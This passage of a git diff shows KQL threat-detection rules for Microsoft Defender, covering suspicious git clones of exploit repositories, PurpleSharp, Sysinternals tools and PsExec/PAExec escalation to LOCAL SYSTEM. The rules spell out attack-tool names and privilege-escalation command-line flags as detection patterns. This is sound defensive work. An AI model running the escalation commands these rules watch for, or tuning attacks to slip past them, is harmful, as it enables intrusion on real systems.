or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains 
"--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone.kql b/KQL/rules/Reconnaissance/suspicious_git_clone.kql index f8589ab0..5eaf3723 100644 --- a/KQL/rules/Reconnaissance/suspicious_git_clone.kql +++ b/KQL/rules/Reconnaissance/suspicious_git_clone.kql 
@@ -1,10 +1,10 @@
-// Title: Suspicious Git Clone
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-03
-// Level: medium
-// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
-// MITRE Tactic: Reconnaissance
-// Tags: attack.reconnaissance, attack.t1593.003
-
-DeviceProcessEvents
+// Title: Suspicious Git Clone
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " clone " or ProcessCommandLine contains "git-remote-https ") and ((FolderPath endswith "\\git.exe" or FolderPath endswith "\\git-remote-https.exe") or ProcessVersionInfoOriginalFileName =~ "git.exe") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql
index 1fcb54bb..a8ab897a 100644
--- a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql
+++ b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Git Clone - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-03
-// Level: medium
-// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
-// MITRE Tactic: Reconnaissance
-// Tags: attack.reconnaissance, attack.t1593.003
-
-DeviceProcessEvents
+// Title: Suspicious Git Clone - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " clone " and FolderPath endswith "/git") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RCE" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/creation_of_a_diagcab.kql b/KQL/rules/Resource Development/creation_of_a_diagcab.kql
index 9806f518..0e0dd198 100644
--- a/KQL/rules/Resource Development/creation_of_a_diagcab.kql
+++ b/KQL/rules/Resource Development/creation_of_a_diagcab.kql
@@ -1,12 +1,12 @@
-// Title: Creation of a Diagcab
-// Author: frack113
-// Date: 2022-06-08
-// Level: medium
-// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development
-// False Positives:
-// - Legitimate microsoft diagcab
-
-DeviceFileEvents
+// Title: Creation of a Diagcab
+// Author: frack113
+// Date: 2022-06-08
+// Level: medium
+// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development
+// False Positives:
+// - Legitimate microsoft diagcab
+
+DeviceFileEvents
 | where FolderPath endswith ".diagcab"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql
index 2f2efedc..1e1b3d91 100644
--- a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql
+++ b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - PurpleSharp Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-06-18
-// Level: critical
-// Description: Detects the execution of the PurpleSharp adversary simulation tool
-// MITRE Tactic: Resource Development
-// Tags: attack.t1587, attack.resource-development
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - PurpleSharp Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-18
+// Level: critical
+// Description: Detects the execution of the PurpleSharp adversary simulation tool
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587, attack.resource-development
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "xyz123456.exe" or ProcessCommandLine contains "PurpleSharp") or (FolderPath contains "\\purplesharp" or ProcessVersionInfoOriginalFileName =~ "PurpleSharp.exe")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql
index d51376c7..1d45be71 100644
--- a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql
+++ b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql
@@ -1,10 +1,10 @@
-// Title: HybridConnectionManager Service Installation - Registry
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2021-04-12
-// Level: high
-// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1608
-
-DeviceRegistryEvents
+// Title: HybridConnectionManager Service Installation - Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2021-04-12
+// Level: high
+// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1608
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Services\\HybridConnectionManager" or (RegistryValueData contains "Microsoft.HybridConnectionManager.Listener.exe" and ActionType =~ "RegistryValueSet")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql
index b7515c03..5c2e7cfe 100644
--- a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql
+++ b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql
@@ -1,13 +1,13 @@
-// Title: Potential Execution of Sysinternals Tools
-// Author: Markus Neis
-// Date: 2017-08-28
-// Level: low
-// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Legitimate use of SysInternals tools
-// - Programs that use the same command line flag
-
-DeviceProcessEvents
+// Title: Potential Execution of Sysinternals Tools
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools
+// - Programs that use the same command line flag
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql
index 9c262e44..46f43302 100644
--- a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql
+++ b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql
@@ -1,13 +1,13 @@ -// Title: Potential Privilege Escalation To LOCAL SYSTEM -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-05-22 -// Level: high -// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 -// False Positives: -// - Weird admins that rename their tools -// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing - -DeviceProcessEvents +// Title: Potential Privilege Escalation To LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-05-22 +// Level: high +// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Weird admins that rename their tools +// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing + +DeviceProcessEvents | where (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or 
ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains 
" -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or 
ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" 
or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") and (not((ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql index 5e52c28e..8e770913 100644 --- a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql +++ b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql 
@@ -1,10 +1,10 @@
-// Title: Potential PsExec Remote Execution
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-28
-// Level: high
-// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587.001
-
-DeviceProcessEvents
+// Title: Potential PsExec Remote Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: high
+// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "accepteula" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " \\\\") and (not((ProcessCommandLine contains "\\\\localhost" or ProcessCommandLine contains "\\\\127.")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql
index ca3b3936..b822e5f9 100644
--- a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql
+++ b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql
@@ -1,13 +1,13 @@ -// Title: PsExec/PAExec Escalation to LOCAL SYSTEM -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-11-23 -// Level: high -// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 -// False Positives: -// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) -// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension - -DeviceProcessEvents +// Title: PsExec/PAExec Escalation to LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-23 +// Level: high +// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) +// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + +DeviceProcessEvents | where (ProcessCommandLine contains "psexec" or ProcessCommandLine contains "paexec" or ProcessCommandLine contains "accepteula") and (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s 
—i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or 
ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s 
pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " 
―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_csexec_execution.kql b/KQL/rules/Resource Development/pua_csexec_execution.kql index e8917c10..c48bd7b9 100644 --- a/KQL/rules/Resource Development/pua_csexec_execution.kql +++ b/KQL/rules/Resource Development/pua_csexec_execution.kql 
@@ -1,10 +1,10 @@
-// Title: PUA - CsExec Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-22
-// Level: high
-// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002
-
-DeviceProcessEvents
+// Title: PUA - CsExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002
+
+DeviceProcessEvents
 | where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
index 0dbbf755..16790602 100644
--- a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
+++ b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
@@ -1,13 +1,13 @@
-// Title: PUA - Sysinternal Tool Execution - Registry
-// Author: Markus Neis
-// Date: 2017-08-28
-// Level: low
-// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Legitimate use of SysInternals tools
-// - Programs that use the same Registry Key
-
-DeviceRegistryEvents
+// Title: PUA - Sysinternal Tool Execution - Registry
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
+// MITRE Tactic: Resource Development
